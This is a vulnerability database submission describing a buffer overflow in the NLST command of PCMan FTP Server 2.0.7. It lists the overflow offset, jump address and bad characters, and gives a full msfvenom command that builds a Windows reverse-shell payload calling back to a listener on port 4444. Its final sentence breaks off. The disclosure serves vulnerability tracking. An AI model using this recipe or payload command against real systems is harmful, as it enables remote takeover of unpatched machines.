Submission #585404: PCMan FTP Server 2.0.7 Buffer Overflow

Information

Title: PCMan FTP Server 2.0.7 Buffer Overflow
Description: This vulnerability is found in the `NLST` command of PCMan 2.0.7. The `RETR` command is typically used to download a file from the server. However, when we send a `NLST` request containing 2006 bytes of offset data, we overwrite the EIP (Extended Instruction Pointer). Once the 4 bytes of the EIP are reached, we overwrite it with a JMP instruction located at address `\x74\xe3\x2f\xd9`. After identifying a suitable JMP address, we determined the list of bad characters to be `\x00`, `\x0a`, and `\x0d`. These characters needed to be excluded from the shellcode to avoid corrupting the payload.

With the buffer structure defined, we appended a shellcode generated using Metasploit's msfvenom tool, with the following command: `msfvenom -p windows/shell_reverse_tcp LHOST=192.168.176.136 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl`

Note: We included a NOP sled consisting of 20 bytes of `0x90` (NOP instructions) before the shellcode to ensure proper alignment and stability during execution. NOPs (No Operation instructions) act as a buffer zone, increasing the chances that the execution flow safely reaches the shellcode. This is a common technique in buffer overflow exploits.

In order for the reverse shell to work, Netcat must be running in listening mode on port 4444. Once the exploit is successfully executed, the shellcode initiates a reverse connection, granting remote access to the vulnerable machine. The exploit was tested in an environment running.
Source: https://github.com/r3ng4f/PCMan_1/blob/main/exploit02.txt
User: r3ng4f (UID 73285)
Submitted: 27/05/2025 14:55 (1 year ago)
Moderated: 29/05/2025 12:03 (2 days later)
Status: Accepted
VulDB Entry: 310504 [PCMan FTP Server 2.0.7 NLST Command Buffer Overflow]
Points: 20
